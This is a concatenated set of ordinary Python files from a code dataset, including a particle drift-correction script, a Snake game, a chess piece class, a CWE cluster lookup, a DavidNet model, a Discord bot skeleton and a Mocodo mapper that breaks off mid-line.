doTrack_direct(pparts,outfile=path+\"/driftcorrectedTracksFM-SR{:}_{:}.txt\".format(2,date),infilename=fn[1],linkRange=link_range)\n #Apply drift correction to other channel and save\n path = os.path.dirname(fn[0])\n '''\n print(\"Correcting for Drift now\")\n sys.stdout.flush()\n pparts = driftCorrection_particles(fn[0],drifttracks)\n conFiles.writeParticleFile(pparts,filename=path+\"/driftlessParticles.txt\")\n date = strftime(\"%Y%m%d-%H%M%S\")\n print(\"Done! Start tracking driftless particles.\")\n t = doTrack_direct(pparts,outfile=\"driftcorrectedTracks-SR{:}_{:}.txt\".format(searchRadius,date),infilename=fn[0],linkRange=link_range,path=path)\n print(\"Done!\")\n return t\n\n\n\nif __name__==\"__main__\":\n\n '''\n driftfile = \"L:/Cel6B-5-26-10/45C/OD1/Experiment4/C-2-AnalyzedData/foundTracks-SR2_20170209-020552.txt\"\n trackfile = \"L:/Cel6B-5-26-10/45C/OD1/Experiment4/C-1-AnalyzedData/foundTracks-SR2_20170209-020551.txt\"\n '''\n driftfile = \"L:/Cel5A-6-22-10/45C/OD06/Experiment3/C-2-AnalyzedData/foundTracks-SR2_20170209-020551.txt\"\n trackfile = \"L:/Cel5A-6-22-10/45C/OD06/Experiment3/C-2-AnalyzedData/foundTracks-SR2_20170209-020551.txt\"\n positionfile = \"L:/Cel5A-6-22-10/45C/OD06/Experiment3/C-2-AnalyzedData/foundPositions.txt\"\n\n drifttracks,driftlist = ctrack.readTrajectoriesFromFile(driftfile)\n part_tracks,part_list = ctrack.readTrajectoriesFromFile(trackfile)\n part_positions = conFiles.readDetectedParticles(positionfile)\n\n #pt = driftCorrection_tracks(part_tracks,drifttracks)\n pparts = driftCorrection_particles(part_positions,drifttracks)\n\n path = os.path.dirname(positionfile)\n \n conFiles.writeParticleFile(pparts,filename=path+\"/driftlessParticles.txt\")\n\n\n\n\n","repo_name":"MarkusRose/ParticleTracker","sub_path":"AnalysisTools/driftCorrection.py","file_name":"driftCorrection.py","file_ext":"py","file_size_in_byte":12127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15712809930","text":"\n\n\n#################### SNAKE GAME ###########################\n\n#Imports\nfrom turtle import Screen\nfrom snake import Snake\nfrom food import Food\nfrom scoreboard import Scoreboard\nfrom title import Title\nfrom field import Field\nimport time\n\n\n#Screen setup\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.bgcolor('black') \nscreen.title('Snake game in Python')\nscreen.tracer(0)\n\n#Create title\ntitle = Title()\n\n#Create field\nfield = Field()\n\n#Create snake\nsnake = Snake()#trigger a create_snake method \n\n#Snake control by keys\nscreen.listen()\nscreen.onkey(snake.up, \"Up\")#Capitalize letter for arrows\nscreen.onkey(snake.down,\"Down\")#func and key in parenthesis\nscreen.onkey(snake.left,\"Left\")\nscreen.onkey(snake.right,\"Right\")\n\n#Create food\nfood = Food()\n\n#Create scoreboard\nscoreboard = Scoreboard()\n\n#Game\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n\n #Snake moving\n snake.move()\n\n #Detect collision with food = update scoreboard = extend snake\n if snake.head.distance(food) < 15:\n #print('nom nom nom')\n food.refresh()#self method from food class\n snake.extend()\n scoreboard.increase_score()#self method from scoreboard class\n\n #End game \n #Detect collision with wall - \n #In while loop to stop the loop!!\n FIELD_SIZE = 257\n if snake.head.xcor() > FIELD_SIZE or snake.head.xcor() < -FIELD_SIZE or snake.head.ycor() > FIELD_SIZE or snake.head.ycor() < -FIELD_SIZE:\n scoreboard.reset_score()#for counting high_score game_is_on is still True\n snake.reset_snake()\n # #stop the game \n # game_is_on = False#Stop loop condition\n # scoreboard.game_over()#Use method from scoreboard class to end game\n # print('GAME OVER')\n\n\n #Collision with tail\n #if head collides with tail any segment in the tail:\n #trigger start counting new_highscore \n for segment in snake.segments[1:]:#loop for every segments\n #slice list to avoid touching head case\n if snake.head.distance(segment) < 10: #check distance segments from head\n scoreboard.reset_score()\n snake.reset_snake()\n # #stop the game\n # game_is_on = False\n # scoreboard.game_over()\n\n\n # #Collision with tail\n # #if head collides with tail any segment in the tail:\n # #trigger game_over\n # for segment in snake.segments:#loop for every segments\n # #to avoid touching head case\n # if segment == snake.head:#without this game is end\n # pass\n # elif snake.head.distance(segment) < 10:\n # # #stop the game\n # # game_is_on = False\n # # scoreboard.game_over()\n\n\n\n#Exit game\nscreen.exitonclick()","repo_name":"RockPiryt/Snake_game_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72631367128","text":"#cofing:utf8\n'''\n 该文档仅用于生成所有文件的路径存入f.txt中\n 前期需将所有文件提取出来放在同一个目录下\n 文件存放路径为F:\\test\\hksl\n 工程存放路径为E:\\python_work\\dtProc\\\n (也可另行编写代码遍历目录下的所有子目录以读取所有文件路径)\n'''\nimport os\n\nwith open(r\"E:\\python_work\\dtProc\\f.txt\",'w+') as f:\n for root,dirs,files in os.walk(r\"F:\\test\\hksl\"):\n print(root,dirs,files)\n for i in files:\n print(root + \"\\\\\" + i + \"\\n\")\n f.write(root + \"\\\\\" + i + \"\\n\")\nf.close()","repo_name":"zhmi1204/satelliteDateDeal","sub_path":"getFilesName.py","file_name":"getFilesName.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36180108017","text":"from database.product_dao import ProductDao\nfrom database.price_by_time_dao import PriceByTimeDao\nfrom managers.manager_helper import ManagerHelper\nfrom utils.response_utils import ResponseUtils\n\nclass PriceByTimeManager(object):\n\n def initialize(self):\n priceByTime = PriceByTimeDao()\n priceByTime.createTable()\n\n #-----------------------------------------------------------------------------\n # insert a new price balancer\n #-----------------------------------------------------------------------------\n def insert(self, sku, token):\n user = ManagerHelper.validateToken(token)\n if 'error' in user:\n return user\n\n #Valide product by Sku\n productDao = ProductDao()\n product, exception = productDao.getProductBySellerSku(user, sku);\n if exception != None:\n return ResponseUtils.generateErrorResponse(exception)\n\n # Add missing arguments and insert to our database\n sku['name'] = product['name'].encode('utf-8')\n sku['link'] = product['url'].encode('utf-8')\n sku['special_price'] = product['special_price']\n\n priceByTime = PriceByTimeDao()\n result = priceByTime.insert(sku, user)\n if 'error' in result:\n return ResponseUtils.generateErrorResponse(result['error'])\n else:\n return ResponseUtils.generateSuccessResponse()\n\n #-----------------------------------------------------------------------------\n # update price balancer's info\n #-----------------------------------------------------------------------------\n def update(self, sku, token):\n user = ManagerHelper.validateToken(token)\n if 'error' in user:\n return user\n\n priceByTime = PriceByTimeDao()\n result = priceByTime.update(sku, user)\n if 'error' in result:\n return ResponseUtils.generateErrorResponse(result['error'])\n else:\n return ResponseUtils.generateSuccessResponse()\n\n #-----------------------------------------------------------------------------\n # delete a price balancer\n #-----------------------------------------------------------------------------\n def delete(self, sku, token):\n user = ManagerHelper.validateToken(token)\n if 'error' in user:\n return user\n\n priceByTime = PriceByTimeDao()\n result = priceByTime.delete(sku, user)\n if 'error' in result:\n return ResponseUtils.generateErrorResponse(result['error'])\n else:\n return ResponseUtils.generateSuccessResponse()\n\n #-----------------------------------------------------------------------------\n # get all price by time\n #-----------------------------------------------------------------------------\n def getAll(self, token):\n user = ManagerHelper.validateToken(token)\n if 'error' in user:\n return user\n\n priceByTime = PriceByTimeDao()\n result = priceByTime.getAll(user)\n if result:\n return ResponseUtils.generateSuccessResponse(result)\n else:\n return ResponseUtils.generateErrorResponse(\"Error\")\n\n\n\n\n\n\n","repo_name":"viethoa/seller","sub_path":"server/managers/price_by_time_manager.py","file_name":"price_by_time_manager.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39420524890","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task(delay=0.05)\ndef task_4_3():\n for i in range(6):\n count=0\n while not wall_is_on_the_right() and count!=27:\n move_right()\n if not cell_is_filled():\n fill_cell()\n count+=1\n count=0\n move_down()\n while not wall_is_on_the_left() and count!=27:\n if not cell_is_filled():\n fill_cell()\n count+=1\n move_left()\n move_down()\n count=0\n move_right()\n pass\n\n\nif __name__ == '__main__':\n run_tasks()\n","repo_name":"G1nger19/Courses","sub_path":"MIPTpython/1.robot-tasks-master/task_20.py","file_name":"task_20.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5187558076","text":"import pandas as pd\nimport numpy as np\nimport glob\nimport datetime as dt\nimport argparse\n\ndef parse_date(f):\n prefix = f.strip(\"./\").split(\".\")[0]\n if len(prefix) == 0:\n return np.nan\n date = dt.datetime.strptime(\"-\".join(prefix.split(\"-\")[1:]), \"%Y-%m-%d\")\n return date\n\ndef read_group(gls):\n dfv = []\n for i,f in enumerate(sorted(glob.glob(gls))):\n date = parse_date(f)\n df = pd.read_csv(f,sep='\\t')\n df['date'] = date\n df['num'] = i\n dfv.append(df)\n return pd.concat(dfv)\n\ndef argparser():\n parser = argparse.ArgumentParser(description=\"Compile and filter periodic reports and cladestats files to produce a set of high quality lineages for formal designation.\")\n parser.add_argument(\"-i\",\"--input\",default='./',help=\"Path to a directory containing *report.tsv and *cladestats.txt files to compile. Defaults to the current directory\")\n parser.add_argument(\"-g\",\"--growth\",default=0,type=float,help=\"Minimum weekly periodic percentage change in the size of the lineage over the period after its first appearance. Default is 0, meaning lineages that shrink or remain static over any week are filtered.\")\n parser.add_argument(\"-s\",\"--final_size\",default=5,type=int,help=\"Set a minimum absolute gain in lineage size over the time period examined. Default 5\")\n parser.add_argument(\"-e\",\"--escape_change\",default=0,type=float,help=\"Minimum gain of immune escape as estimated by Bloom DMS data. Default is 0 (no change to escape value).\")\n parser.add_argument(\"-p\",\"--persistence\",default=0,type=int,help=\"Minimum number of consecutive trees since designation to include a lineage. Default 0 (new lineages in the final tree can be accepted).\")\n parser.add_argument(\"-o\",\"--output\",default=\"compiled_report.tsv\",help=\"Name the compiled output report tsv.\")\n parser.add_argument(\"-a\",\"--active\",action='store_true',help='Include only lineages that were actively growing within the last week examined.')\n return parser.parse_args()\n\ndef main():\n args = argparser()\n rdf = read_group(args.input + \"*proposed.report.tsv\")\n cdf = read_group(args.input + \"*cladestats.txt\")\n sizes = cdf.set_index(['clade','num']).sort_index().groupby(\"clade\").inclusive_count.max().to_dict()\n dates = cdf.set_index(['clade','num']).sort_index().groupby(\"clade\").date.max().to_dict()\n tchange = cdf.set_index(['clade','num']).sort_index().groupby(\"clade\").exclusive_count.pct_change()\n slopes = tchange.groupby(level=0).min().to_dict()\n tchange = tchange.reset_index()\n recent = set(tchange[(tchange.num == tchange.num.max()) & (tchange.exclusive_count > 0)].clade)\n rdf['final_date'] = rdf.proposed_sublineage.apply(lambda x:dates.get(x,np.nan))\n rdf['final_size'] = rdf.proposed_sublineage.apply(lambda x:sizes.get(x,np.nan))\n rdf['active'] = rdf.proposed_sublineage.isin(recent)\n rdf['growth'] = rdf.proposed_sublineage.apply(lambda x:slopes.get(x,np.nan))\n pd = cdf.clade.value_counts().to_dict()\n rdf['persistence'] = rdf.proposed_sublineage.apply(lambda x:pd.get(x,np.nan))\n rdf['total_growth'] = rdf['final_size'] - rdf['proposed_sublineage_size']\n #exclude proposed sublineages that are in turn descendents of existing proposals.\n final = rdf[(rdf.total_growth >= args.final_size) & (rdf.net_escape_gain >= args.escape_change) & (rdf.growth > args.growth) & (args.persistence <= rdf.persistence) & (rdf.parent.apply(lambda x:\"auto.\" not in x))]\n final.to_csv(args.output,sep='\\t',index=False)\n\nif __name__ == \"__main__\":\n main()","repo_name":"jmcbroome/timeseries-lineage-analysis","sub_path":"compile_reports.py","file_name":"compile_reports.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44487844836","text":"class Piece:\n def __init__(self, piece_type, team, top_team='white'):\n self.piece_type = piece_type\n self.team = team\n self.first_move = True # To check if it's the pawn's first move\n self.top_team = top_team\n\n def can_move(self, start, end, board, n_kings, last_double_step_move=None):\n return self.is_valid_move(start,end, board, last_double_step_move) and not self.check_for_pin(board, self.team, start, end, n_kings)\n\n def is_valid_move(self, start, end, board, last_double_step_move=None):\n if self.piece_type == 'p':\n return self.is_valid_pawn_move(start, end, board, last_double_step_move)\n if self.piece_type == 'k':\n return self.is_valid_king_move(start, end, board)\n if self.piece_type == 'q':\n return self.is_valid_queen_move(start, end, board)\n if self.piece_type == 'r':\n return self.is_valid_rook_move(start, end, board)\n if self.piece_type == 'b':\n return self.is_valid_bishop_move(start, end, board)\n if self.piece_type == 'n':\n return self.is_valid_knight_move(start, end, board)\n return False\n \n # def is_valid_move(self, start, end, board, last_double_step_move=None):\n # valid_movements = {\n # 'p': self.is_valid_pawn_move,\n # 'k': self.is_valid_king_move,\n # 'q': self.is_valid_queen_move,\n # 'r': self.is_valid_rook_move,\n # 'b': self.is_valid_bishop_move,\n # 'n': self.is_valid_knight_move\n # }\n # validation_function = valid_movements.get(self.piece_type)\n # if validation_function:\n # if self.piece_type == 'p':\n # return validation_function(start, end, board, last_double_step_move)\n # else:\n # return validation_function(start, end, board)\n # return False\n\n def is_valid_pawn_move(self, start, end, board, last_double_step_move=None):\n # Determine the direction of movement based on the top team\n if self.top_team == self.team:\n direction = -1\n start_row = 6\n en_passant_row = 3\n else:\n direction = 1\n start_row = 1\n en_passant_row = 4\n\n # Check if the move is a regular pawn move\n if start[1] == end[1] and board[end[0]][end[1]] is None:\n if start[0] + direction == end[0]:\n return True\n if self.first_move and start[0] + 2 * direction == end[0] and board[start[0] + direction][start[1]] is None:\n return True\n\n # Check if the move is a capture\n if abs(start[1] - end[1]) == 1 and board[end[0]][end[1]] is not None and board[end[0]][end[1]].team != self.team:\n if start[0] + direction == end[0]:\n return True\n\n # Check if the move is an en passant capture\n if last_double_step_move is not None and last_double_step_move[1] == end[1] and last_double_step_move[0] == en_passant_row:\n if start[0] == en_passant_row + direction and end[0] == en_passant_row and abs(start[1] - end[1]) == 1:\n return True\n\n return False\n\n def is_valid_king_move(self, start, end, board):\n dx = abs(end[0] - start[0])\n dy = abs(end[1] - start[1])\n # Check if king is moving to a square within one step\n if dx <= 1 and dy <= 1:\n # If king is in columns 1-6, it cannot move to column 7 or greater\n if start[1] <= 6 and end[1] >= 7:\n return False\n # If king is in columns 8-13, it cannot move to column 7 or less\n elif start[1] >= 8 and end[1] <= 7:\n return False\n # Otherwise, the king is moving within its allowed columns\n else:\n return (board[end[0]][end[1]] is None or board[end[0]][end[1]].team != self.team)\n else:\n return False\n\n def is_valid_queen_move(self, start, end, board):\n dx = end[0] - start[0]\n dy = end[1] - start[1]\n if dx == 0 or dy == 0 or abs(dx) == abs(dy): # moving in a straight line\n step_x = dx // max(1, abs(dx))\n step_y = dy // max(1, abs(dy))\n for i in range(1, max(abs(dx), abs(dy))):\n # Checking all intermediate squares for pieces\n if board[start[0]+i*step_x][start[1]+i*step_y] is not None:\n return False\n return board[end[0]][end[1]] is None or board[end[0]][end[1]].team != self.team\n return False\n \n def is_valid_rook_move(self, start, end, board):\n dx = end[0] - start[0]\n dy = end[1] - start[1]\n if dx == 0 or dy == 0: # moving in a straight line\n step_x = dx // max(1, abs(dx)) if dx != 0 else 0\n step_y = dy // max(1, abs(dy)) if dy != 0 else 0\n for i in range(1, max(abs(dx), abs(dy))):\n # Checking all intermediate squares for pieces\n if board[start[0]+i*step_x][start[1]+i*step_y] is not None:\n return False\n return board[end[0]][end[1]] is None or board[end[0]][end[1]].team != self.team\n return False\n\n def is_valid_bishop_move(self, start, end, board):\n dx = end[0] - start[0]\n dy = end[1] - start[1]\n if abs(dx) == abs(dy): # moving diagonally\n step_x = dx // max(1, abs(dx))\n step_y = dy // max(1, abs(dy))\n for i in range(1, abs(dx)): # dx and dy are same in magnitude\n # Checking all intermediate squares for pieces\n if board[start[0]+i*step_x][start[1]+i*step_y] is not None:\n return False\n return board[end[0]][end[1]] is None or board[end[0]][end[1]].team != self.team\n return False\n\n def is_valid_knight_move(self, start, end, board):\n dx = abs(end[0] - start[0])\n dy = abs(end[1] - start[1])\n # Knight moves two squares in one direction and one in the other\n return (dx, dy) == (2, 1) or (dx, dy) == (1, 2)\n \n def check_for_check(self, board, team, king_pos):\n for row in range(8):\n for col in range(13):\n piece = board[row][col]\n if piece is not None and piece.team != team and piece.is_valid_move((row, col), king_pos, board):\n return True\n return False\n \n def check_for_checkmate(self, board, team, king_pos):\n for row in range(8):\n for col in range(13):\n piece = board[row][col]\n if piece is not None and piece.team == team:\n for i in range(8):\n for j in range(13):\n if piece.is_valid_move((row, col), (i, j), board):\n return False\n return True\n \n def check_for_stalemate(self, board, team, king_pos):\n for row in range(8):\n for col in range(13):\n piece = board[row][col]\n if piece is not None and piece.team == team:\n for i in range(8):\n for j in range(13):\n if piece.is_valid_move((row, col), (i, j), board):\n return False\n return True\n \n def check_for_pin(self, board, team, begin, end, n_kings):\n if n_kings == 2:\n return False\n\n # Find the kings\n king_pos = None\n for row in range(8):\n for col in range(13):\n piece = board[row][col]\n if piece is not None and piece.team == team and piece.piece_type == 'k':\n king_pos = (row, col)\n \n # Check if the piece is pinned\n # Simulate the move\n temp = board[end[0]][end[1]]\n board[end[0]][end[1]] = board[begin[0]][begin[1]]\n board[begin[0]][begin[1]] = None\n\n # Check if the king is in check\n retval = self.check_for_check(board, team, king_pos)\n\n # Undo the move\n board[begin[0]][begin[1]] = board[end[0]][end[1]]\n board[end[0]][end[1]] = temp\n\n return retval\n\n","repo_name":"Lorenc1o/twochess","sub_path":"twochess/piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"9056862057","text":"import re\nimport consts\n\nclass cwe_cluster_finder:\n\n def __init__(self):\n return\n\n def find_cluster(self, cwe):\n with open(consts.arbre_path) as arbre:\n datafile = arbre.readlines()\n \n with open(consts.liste_no_arbre_path) as not_in_arbre:\n datafile_not_in_arbre = not_in_arbre.readlines()\n\n for line in datafile:\n if '(' + cwe + ')' in line:\n if \"Primary Cluster\" in line:\n return (cwe, None, 'arbre.txt')\n else:\n m = self.find_primary_cluster(line)\n\n if \"Secondary Cluster\" in line:\n return (m, cwe, 'arbre.txt')\n else:\n x = self.find_secondary_cluster(line)\n return (m, x, 'arbre.txt')\n\n else:\n for l in datafile_not_in_arbre:\n if \"CWE-\"+cwe == l.split(\",\")[0]:\n prim_cluster = l.split(\",\")[1]\n sec_cluster = l.split(\",\")[2]\n return (prim_cluster, sec_cluster.rstrip(), 'liste_no_arbre.csv')\n\n def find_primary_cluster(self,l):\n\n primary_cluster = None\n\n with open(consts.arbre_path) as arbre:\n datafile = arbre.readlines()\n\n primary = []\n ligne = []\n\n for i, line in enumerate(datafile, 1):\n if l in line:\n num_line_l = i\n\n if \"Primary Cluster\" in line:\n primary.append(str(i)+line)\n\n for p in primary:\n num_line_m = p.split(\"-\")[0]\n\n if int(num_line_m) < num_line_l:\n ligne.append(p)\n\n primary_cluster = str(ligne[-1])\n primary_cluster = re.findall(r\"\\(\\s*\\+?(-?\\d+)\\s*\\)\", primary_cluster)\n primary_cluster = str(primary_cluster)\n primary_cluster = primary_cluster.split(\"'\")[1]\n\n return primary_cluster\n\n def find_secondary_cluster(self,l):\n good_secondary_cluster = []\n m = self.find_primary_cluster(l)\n m = str('(' + m + ')')\n\n n = re.findall(r\"\\(\\s*\\+?(-?\\d+)\\s*\\)\", l)\n n = str(n)\n n = n.split(\"'\")[1]\n n = str('(' + n + ')')\n\n secondary_cluster = None\n\n with open(consts.arbre_path) as arbre:\n \n datafile = arbre.readlines()\n \n secondarys = []\n\n for i, line in enumerate(datafile, 1):\n if n in line:\n num_line_n = int(i)\n\n if m in line:\n num_line_m = int(i)\n\n if \"Secondary Cluster\" in line:\n secondarys.append(str(i)+line)\n\n for s in secondarys:\n num_line_x = s.split('-')[0]\n num_line_x = int(num_line_x)\n\n if num_line_x > num_line_m and num_line_x < num_line_n:\n good_secondary_cluster.append(s)\n\n if len(good_secondary_cluster) == 0:\n return None\n\n else:\n secondary_cluster = str(good_secondary_cluster[-1])\n secondary_cluster = re.findall(r\"\\(\\s*\\+?(-?\\d+)\\s*\\)\", secondary_cluster)\n secondary_cluster = str(secondary_cluster)\n secondary_cluster = secondary_cluster.split(\"'\")[1]\n\n return secondary_cluster","repo_name":"rayan776/predict_cve_exploited","sub_path":"cwe_cluster_finder.py","file_name":"cwe_cluster_finder.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40296870398","text":"import torch\nfrom torch import nn\n\ndef davidnet():\n return DavidNet()\n\nclass BatchNorm(nn.BatchNorm2d):\n def __init__(self, num_features, eps=1e-05, momentum=0.1, weight_freeze=False, bias_freeze=False, weight_init=1.0, bias_init=0.0, **kwargs):\n super().__init__(num_features, eps=eps, momentum=momentum, **kwargs)\n if weight_init is not None: self.weight.data.fill_(weight_init)\n if bias_init is not None: self.bias.data.fill_(bias_init)\n self.weight.requires_grad = not weight_freeze\n self.bias.requires_grad = not bias_freeze\n\nclass ConvBn(nn.Module):\n def __init__(self, ch_in, ch_out, kernel_size=3, padding=1, stride=1) -> None:\n super().__init__()\n self._op = nn.Sequential(\n nn.Conv2d(ch_in, ch_out, kernel_size=kernel_size, stride=stride, padding=padding, bias=False),\n BatchNorm(ch_out),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n return self._op(x)\n\nclass ConvBnPool(nn.Module):\n def __init__(self, ch_in, ch_out, kernel_size=3, padding=1, stride=1) -> None:\n super().__init__()\n self._op = nn.Sequential(\n ConvBn(ch_in, ch_out, kernel_size=kernel_size, stride=stride, padding=padding),\n nn.MaxPool2d(2)\n )\n\n def forward(self, x):\n return self._op(x)\n\nclass ConvRes(nn.Module):\n def __init__(self, ch_in, ch_out) -> None:\n super().__init__()\n self._stem = ConvBnPool(ch_in, ch_out)\n self._op = nn.Sequential(\n ConvBn(ch_out, ch_out),\n ConvBn(ch_out, ch_out)\n )\n\n def forward(self, x):\n h = self._stem(x)\n return h + self._op(h)\n\nclass DavidNet(nn.Module):\n def __init__(self, pretrained=False) -> None:\n super().__init__()\n assert not pretrained\n self._op = nn.Sequential(\n ConvBn(3, 64),\n ConvRes(64, 64),\n ConvBnPool(64, 64*2),\n ConvRes(64*2, 64*4),\n nn.AdaptiveMaxPool2d(1),\n )\n self._linear = nn.Linear(in_features=256, out_features=10, bias=True)\n\n def forward(self, x):\n x = self._op(x).squeeze()\n x = self._linear(x)\n return x\n","repo_name":"sytelus/cifar_testbed","sub_path":"torch_testbed/cifar10_models/davidnet.py","file_name":"davidnet.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47968314704","text":"\"\"\"\n\tTrance. A bot developed for Elements, The Music Club.\n\tShe has some commands that deal with:\n\t\t> voting\n\t\t> logging\n\t\t> converting links between platforms\n\n\tDate: 2019-Jun-15\n\"\"\"\nimport discord\nfrom discord.ext import commands\n\nimport asyncio\n\nfrom datetime import datetime\n\nfrom pathlib import Path\nimport os\n\nimport logging\n\nlogger = logging.getLogger('discord')\nlogger.setLevel(logging.DEBUG)\nhandler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\nlogger.addHandler(handler)\n\n# List of Directories\ndir_core = Path(\"core/\")\ndir_res = Path(\"res/\")\n\n# READ TOKEN\nwith open(dir_res / \"meta\" / \"TOKEN\", 'r') as TokenFObj:\n\tTOKEN = TokenFObj.read()\n\nBOT_PREFIX = ('++')\nbot = commands.Bot(command_prefix=BOT_PREFIX)\n\n@bot.event\nasync def on_ready():\n\tactivity = discord.Game(\"Music\")\n\tawait bot.change_presence(activity = activity)\n\n\t# LOAD COGS\n\tcogsList = ['cogs.owner.owner', 'cogs.meetup.meetup']\n\t\n\tfor cog in cogsList:\n\t\tprint (\"Loading:\\t\" + cog + \"...\")\n\t\tbot.load_extension(cog)\n\n\tprint (str(bot.user), \"is Ready\")\n\n@bot.event\nasync def on_message(message):\n\tif message.author == bot.user:\n\t\treturn\n\n\tawait bot.process_commands(message)\n\n# RUN THE BOT\nbot.run(TOKEN)\n\n### NOTHING AFTER THIS WORKS","repo_name":"IceCereal/Trance","sub_path":"core/trance.py","file_name":"trance.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16406471990","text":"n = int(input())\narr = list(map(int, input().split()))\nans = [0 for _ in range(n)]\n\nfor i in range(1,n+1): # 1,2,3... 키를 나타내는 것\n tmp = arr[i-1]\n cnt = 0\n for j in range(n):\n if cnt == tmp and ans[j] == 0:\n ans[j] = i # 그 떄의 위치에 키를 삽입 \n break # ex) 키 1 짜리는 왼쪽에 2개 있고 3번째 위치에 위치한다.\n elif ans[j] == 0:\n cnt += 1\nprint(*ans) \n","repo_name":"choijaehoon1/backjoon","sub_path":"greedy_algorithm/test08.py","file_name":"test08.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11958035212","text":"import contextlib\nfrom pathlib import Path\nimport random\nimport re\n\n__import__(\"sys\").path[0:0] = [\".\"]\n\nfrom ..parse_mcd import Transformer\nfrom ..tools.parser_tools import transform_source\nfrom ..tools.string_tools import ascii, camel, snake, pascal, TRUNCATE_DEFAULT_SIZE\nfrom ..mocodo_error import MocodoError\nfrom .cards import fix_card, infer_dfs, infer_roles\nfrom .types import read_default_datatypes, create_type_placeholders, guess_types\nfrom .obfuscate import obfuscator_factory\nfrom .arrows import create_df_arrows\nfrom .constraints import create_cifs\n\nELEMENT_TO_TOKENS = {\n \"arrows\": [\"leg_arrow\"],\n \"attrs\": [\"attr\"],\n \"boxes\": [\"box_name\"],\n \"card_prefixes\": [\"card_prefix\"],\n \"cards\": [\"card\"],\n \"roles\": [\"leg_note\"],\n \"leg_notes\": [\"leg_note\"],\n \"constraint_notes\": [\"constraint_note\"],\n \"labels\": [\"box_name\", \"attr\"],\n \"texts\": [\"box_name\", \"attr\", \"leg_note\", \"constraint_note\"],\n \"notes\": [\"leg_note\", \"constraint_note\"],\n \"types\": [\"datatype\"],\n}\n\nGENERAL_OPERATIONS = { # operations that can be applied to any token\n \"ascii\": ascii,\n \"camel\": camel,\n \"capitalize\": lambda x: x.capitalize(),\n \"casefold\": lambda x: x.casefold(),\n \"echo\": lambda x: x,\n \"lower\": lambda x: x.lower(),\n \"pascal\": pascal,\n \"snake\": snake,\n \"swapcase\": lambda x: x.swapcase(),\n \"title\": lambda x: x.title(),\n \"upper\": lambda x: x.upper(),\n}\n\n\nclass Mapper(Transformer):\n\n def __init__(self, op_name, pre_token, subsubarg, params):\n tokens = ELEMENT_TO_TOKENS[pre_token]\n op = GENERAL_OPERATIONS.get(op_name)\n if op is None: # op_tk operations with limited applicability and/or using a subsubarg\n if op_name == \"randomize\" and pre_token == \"types\":\n resource_dir = Path(params[\"script_directory\"], \"resources\")\n pool = list(dict(read_default_datatypes(resource_dir)).values())\n op = lambda _: random.choice(pool)\n elif op_name == \"delete\" and pre_token in (\"attrs\", \"notes\", \"roles\", \"constraint_notes\", \"arrows\", \"types\", \"card_prefixes\"):\n op = lambda _: \"\"\n elif op_name == \"delete\" and pre_token == \"cards\":\n op = lambda _: \"XX\"\n elif op_name == \"fix\" and pre_token == \"cards\":\n op = fix_card\n elif op_name == \"randomize\" and pre_token in (\"labels\", \"texts\", \"boxes\", \"attrs\", \"notes\", \"roles\", \"constraint_notes\"):\n op = obfuscator_factory(subsubarg, params)\n elif op_name == \"truncate\":\n truncate_size = TRUNCATE_DEFAULT_SIZE\n if subsubarg and subsubarg.isdigit():\n truncate_size = int(subsubarg) or truncate_size\n op = lambda x: x[:truncate_size]\n elif op_name == \"slice\":\n slice_start = slice_stop = None\n if subsubarg:\n with contextlib.suppress(ValueError):\n slice_start = int(subsubarg.partition(\":\")[0])\n with contextlib.suppress(ValueError):\n slice_stop = int(subsubarg.partition(\":\")[2])\n op = lambda x: x[slice_start:slice_stop]\n elif op_name == \"replace\":\n (substring, __, repl) = subsubarg.partition(\"/\")\n op = lambda x: x.replace(substring, repl)\n elif op_name == \"suffix\":\n op = lambda x: f\"{x}{subsubarg}\"\n elif op_name == \"prefix\":\n op = lambda x: f\"{subsubarg}{x}\"\n else:\n raise MocodoError(24, _('Operation \"{op_name}\" cannot be applied to \"{pre_token}\".').format(op_name=op_name, pre_token=pre_token))\n update_first_child = lambda tree: tree[0].update(value=op(tree[0].value))\n for token in tokens:\n setattr(self, token, update_first_child)\n\n\ndef run(source, op_name, subargs, params, **kargs):\n if op_name == \"randomize\" and not subargs:\n subargs = {\"labels\": \"\"} # used for obfuscation\n elif op_name == \"delete\" and not subargs:\n subargs = dict.fromkeys(\"types notes attrs cards\".split(), \"\")\n for (pre_token, subsubarg) in subargs.items():\n # filter special non-op_tk operations\n if op_name == \"create\" and pre_token == \"types\":\n source = create_type_placeholders(source, subsubarg) if subsubarg is not None else guess_types(source, params)\n elif op_name == \"create\" and pre_token == \"df_arrows\":\n source = create_df_arrows(source, subsubarg)\n elif op_name == \"create\" and 